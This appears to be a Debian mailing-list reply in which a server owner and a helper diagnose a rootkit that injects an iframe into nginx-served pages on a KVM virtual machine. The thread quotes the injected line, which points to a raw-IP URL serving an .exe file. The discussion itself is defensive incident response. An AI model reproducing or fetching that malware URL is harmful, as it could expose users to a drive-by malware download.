Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 07:15:57PM +0900, Joel Rees wrote:
>
> > The lynx webrowser shows this as the first line of the webpages:
>
> Local on the machine in question or external?
external.
> > IFRAME: http://122.226.137.123:1111/yixi.exe
> >
> > It also appears in downloads using wget.
> > "view source" in firefox or chrome show nothing amiss.
External. I figure firefox and chrome discard the new line, since it's
not appropriate before the doctype.
> > It only appears on IPv4, not IPv6.
>
> Again, are the browsers local to the machine in question or accessing
> from the network?
External.
> Okay, so, if it isn't something on an external box hijacking the IP
> address of the box in question, it's a local process or set of
> processes hijacking port 80 and trying unsuccessfully to be a
> pass-through proxy.
Yes. The same as the rootkit in 64-bit squeeze last year.
> How much time/resources can you afford to spend on trying to pin the
> intrusion vector down?
>
> Although, I'd hesitate to use the box for anything important, even
> after a complete wipe/install, unless the BIOS can be safely restored
> from a write-protected backup image. And I'd try to be careful enough
> during the install that if the exploit were repeated, I'd notice
> immediately and thus be able to pin the thing more closely.
>
> Maybe build the server as a VM and take snapshots as you go. Or
> rebuild it on a different machine, with the old server reboot from a
> live CD before each major step and use the tools on the live CD to
> take the snapshots.
>
> --
> Joel Reese
This is a KVM virtual machine in a datacenter. No BIOS. I can wait a
few days to rebuild. It's off right now, I'm not going to trust it for
anything.
E Frank Ball frankb@efball.com
Reply to: